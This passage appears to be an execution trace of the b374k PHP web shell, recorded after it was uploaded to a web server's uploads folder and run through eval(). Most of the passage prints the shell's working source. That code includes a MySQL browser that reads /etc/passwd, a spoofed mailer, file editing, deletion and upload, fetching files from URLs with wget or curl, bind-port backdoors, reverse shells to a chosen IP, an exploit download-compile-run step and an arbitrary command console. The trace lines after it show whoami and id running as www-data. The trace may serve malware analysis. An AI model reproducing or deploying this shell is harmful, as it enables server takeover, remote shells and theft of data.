isset($_GET[\'sqlpass\']) && isset($_GET[\'sqlport\'])){ $sqlhost = $_GET[\'sqlhost\']; $sqluser = $_GET[\'sqluser\']; $sqlpass = $_GET[\'sqlpass\']; $sqlport = $_GET[\'sqlport\']; if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\\"width:99%;padding:4px 10px 0 10px;\\">"; $msg .= "<p>Connected to ".$sqluser."<span class=\\"gaya\\">@</span>".$sqlhost.":".$sqlport; $msg .= " <span class=\\"gaya\\">-></span> <a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&\\">[ databases ]</a>"; if(isset($_GET[\'db\'])) $msg .= " <span class=\\"gaya\\">-></span> <a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET[\'db\']."\\">".htmlspecialchars($_GET[\'db\'])."</a>"; if(isset($_GET[\'table\'])) $msg .= " <span class=\\"gaya\\">-></span> <a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET[\'db\']."&table=".$_GET[\'table\']."\\">".htmlspecialchars($_GET[\'table\'])."</a>"; $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>"; $msg .= "</div>"; echo $msg; if(isset($_GET[\'db\']) && (!isset($_GET[\'table\'])) && (!isset($_GET[\'sqlquery\']))){ $db = $_GET[\'db\']; $query = "DROP TABLE IF EXISTS b374k_table;\\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\\nLOAD DATA INFILE \\"/etc/passwd\\"\\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\\nDROP TABLE IF EXISTS b374k_table;"; $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">$query</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $tables = array(); $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables); foreach($tables as $table){ $msg .= "<tr><td><a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."\\">$table</a></td></tr>"; } $msg .= "</table>"; } elseif(isset($_GET[\'table\']) && (!isset($_GET[\'sqlquery\']))){ $db = $_GET[\'db\']; $table = $_GET[\'table\']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <input type=\\"hidden\\" name=\\"table\\" value=\\"".$table."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $columns = array(); $msg = "<table class=\\"explore\\" style=\\"width:99%;\\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET[\'z\'])) $page = (int) $_GET[\'z\']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){ if(trim($data) == "") $data = " "; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\\"padding:10px 0 0 6px;\\"> <form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <input type=\\"hidden\\" name=\\"table\\" value=\\"".$table."\\" /> Page <select class=\\"inputz\\" name=\\"z\\" onchange=\\"this.form.submit();\\">"; for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\\"".$i."\\">".$i."</option>"; if($i == $_GET[\'z\']) $head .= "<option value=\\"".$i."\\" selected=\\"selected\\">".$i."</option>"; } $head .= "</select><noscript><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET[\'submitquery\']) && ($_GET[\'sqlquery\'] != "")){ $db = $_GET[\'db\']; $query = magicboom($_GET[\'sqlquery\']); $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; <span class=\\"gaya\\">[</span> ok <span class=\\"gaya\\">]</span></p>"; $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; <span class=\\"gaya\\">[</span> error <span class=\\"gaya\\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\\nSHOW VARIABLES;\\nSHOW STATUS;"; $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr><th>available databases</th></tr>"; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."\\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\\"text-align:center;\\">cant connect to mysql server</p>"; echo $msg; } else{ ?> <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr> <tr><td> Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form> <?php }} elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mail\')){ if(isset($_POST[\'mail_send\'])){ $mail_to = $_POST[\'mail_to\']; $mail_from = $_POST[\'mail_from\']; $mail_subject = $_POST[\'mail_subject\']; $mail_content = magicboom($_POST[\'mail_content\']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?> <form action="?y=<?php echo $pwd; ?>&x=mail" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea> <tr><td> <input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" /> mail to</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="b374k@fbi.gov" name="mail_from" /> from</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" /> subject</td></tr> <tr><td> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form> <tr><td> <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'phpinfo\')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\\"phpinfo\\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET[\'view\']) && ($_GET[\'view\'] != "")){ if(is_file($_GET[\'view\'])){ if(!isset($file)) $file = magicboom($_GET[\'view\']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\\"margin:6px 0 0 2px;line-height:20px;\\"> <tr><td>Filename</td><td><span id=\\"".clearspace($filn)."_link\\">".$file."</span> <form action=\\"?y=".$pwd."&view=$file\\" method=\\"post\\" id=\\"".clearspace($filn)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$filn."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$filn."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\\"?y=$pwd&edit=$file\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&delete=$file\\">delete</a> | <a href=\\"?y=$pwd&dl=$file\\">download</a> (<a href=\\"?y=$pwd&dlgzip=$file\\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\\"?y=".$pwd."&view=".$file."\\">text</a> | <a href=\\"?y=".$pwd."&view=".$file."&type=code\\">code</a> | <a href=\\"?y=".$pwd."&view=".$file."&type=image\\">image</a></td></tr> </table> "; if(isset($_GET[\'type\']) && ($_GET[\'type\']==\'image\')){ echo "<div style=\\"text-align:center;margin:8px;\\"><img src=\\"?y=".$pwd."&img=".$filn."\\"></div>"; } elseif(isset($_GET[\'type\']) && ($_GET[\'type\']==\'code\')){ echo "<div class=\\"viewfile\\">"; $file = wordwrap(@file_get_contents($file),"240","\\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\\"viewfile\\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET[\'view\'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET[\'edit\']) && ($_GET[\'edit\'] != "")){ if(isset($_POST[\'save\'])){ $file = $_POST[\'saveas\']; $content = magicboom($_POST[\'content\']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved <span class=\\"gaya\\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET[\'edit\']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("\'\'","\'",fgets($filez))); } @fclose($filez); } ?> <form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content"> <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'upload\')){ if(isset($_POST[\'uploadcomp\'])){ if(is_uploaded_file($_FILES[\'file\'][\'tmp_name\'])){ $path = magicboom($_POST[\'path\']); $fname = $_FILES[\'file\'][\'name\']; $tmp_name = $_FILES[\'file\'][\'tmp_name\']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST[\'uploadurl\'])){ $pilihan = trim($_POST[\'pilihan\']); $wurl = trim($_POST[\'wurl\']); $path = magicboom($_POST[\'path\']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?> <form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post"> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload"> <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'netsploit\')){ if (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'C\')) { $port = trim($_POST[\'port\']); $passwrd = trim($_POST[\'bind_pass\']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'Perl\')) { $port = trim($_POST[\'port\']); $passwrd = trim($_POST[\'bind_pass\']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'C\')) { $ip = trim($_POST[\'ip\']); $port = trim($_POST[\'backport\']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'Perl\')) { $ip = trim($_POST[\'ip\']); $port = trim($_POST[\'backport\']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST[\'expcompile\']) && !empty($_POST[\'wurl\']) && !empty($_POST[\'wcmd\'])) { $pilihan = trim($_POST[\'pilihan\']); $wurl = trim($_POST[\'wurl\']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv(\'REMOTE_ADDR\')) ? (getenv(\'REMOTE_ADDR\')) : ("127.0.0.1")); ?>"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr> <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'shell\')){ ?> <form action="?y=<?php echo $pwd; ?>&x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST[\'submitcmd\'])) { echo @exe($_POST[\'cmd\']); } ?> </textarea> <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET[\'delete\']) && ($_GET[\'delete\'] != "")){ $file = $_GET[\'delete\']; @unlink($file); } elseif(isset($_GET[\'fdelete\']) && ($_GET[\'fdelete\'] != "")){ @rmdir(rtrim($_GET[\'fdelete\'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET[\'mkdir\']) && ($_GET[\'mkdir\'] != "")){ $path = $pwd.$_GET[\'mkdir\']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?> </div> </body> </html> ' /var/www/html/uploads/b4k.php.suspected 194 0
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $ver = '1.01'
3 9 0 0.003032 692760 getenv 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'SERVER_SOFTWARE'
3 9 1 0.003050 692840
3 9 R 'Apache/2.4.52 (Ubuntu)'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $software = 'Apache/2.4.52 (Ubuntu)'
3 10 0 0.003081 692808 ini_get 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'safe_mode'
3 10 1 0.003096 692840
3 10 R FALSE
3 11 0 0.003110 692808 ini_get 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'safe_mode'
3 11 1 0.003123 692840
3 11 R FALSE
3 12 0 0.003137 692808 strtolower 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 FALSE
3 12 1 0.003151 692840
3 12 R ''
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $safemode = FALSE
3 13 0 0.003177 692808 php_uname 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 0
3 13 1 0.003192 692920
3 13 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $system = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
3 14 0 0.003228 692920 substr 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 0 3
3 14 1 0.003246 693048
3 14 R 'Lin'
3 15 0 0.003259 692952 strtolower 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'Lin'
3 15 1 0.003273 693016
3 15 R 'lin'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $win = FALSE
3 16 0 0.003299 692920 exe 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'whoami'
4 17 0 0.003313 692920 function_exists 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'system'
4 17 1 0.003327 692960
4 17 R TRUE
4 18 0 0.003340 692920 ob_start 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 0
4 18 1 0.003353 709432
4 18 R TRUE
4 19 0 0.003366 709432 system 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'whoami'
4 19 1 0.004631 709504
4 19 R 'www-data'
4 20 0 0.004655 709432 ob_get_contents 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 0
4 20 1 0.004670 709472
4 20 R 'www-data\n'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff = 'www-data\n'
4 21 0 0.004698 709472 ob_end_clean 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 0
4 21 1 0.004712 692960
4 21 R TRUE
3 16 1 0.004725 692960
3 16 R 'www-data\n'
3 22 0 0.004745 692960 rapih 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'www-data\n'
4 23 0 0.004760 692960 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 '<br />' '' 'www-data\n'
4 23 1 0.004777 693056
4 23 R 'www-data\n'
4 24 0 0.004791 692960 trim 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'www-data\n'
4 24 1 0.004805 693032
4 24 R 'www-data'
3 22 1 0.004818 693000
3 22 R 'www-data'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $user = 'www-data'
3 25 0 0.004844 692960 exe 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'id'
4 26 0 0.004857 692960 function_exists 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'system'
4 26 1 0.004871 693000
4 26 R TRUE
4 27 0 0.004884 692960 ob_start 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 0
4 27 1 0.004898 709472
4 27 R TRUE
4 28 0 0.004910 709472 system 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'id'
4 28 1 0.009025 709584
4 28 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
4 29 0 0.009063 709472 ob_get_contents 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 0
4 29 1 0.009079 709552
4 29 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 30 0 0.009112 709552 ob_end_clean 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 0
4 30 1 0.009127 693040
4 30 R TRUE
3 25 1 0.009141 693040
3 25 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
3 31 0 0.009157 693040 rapih 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 32 0 0.009174 693040 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 '<br />' '' 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 32 1 0.009193 693136
4 32 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
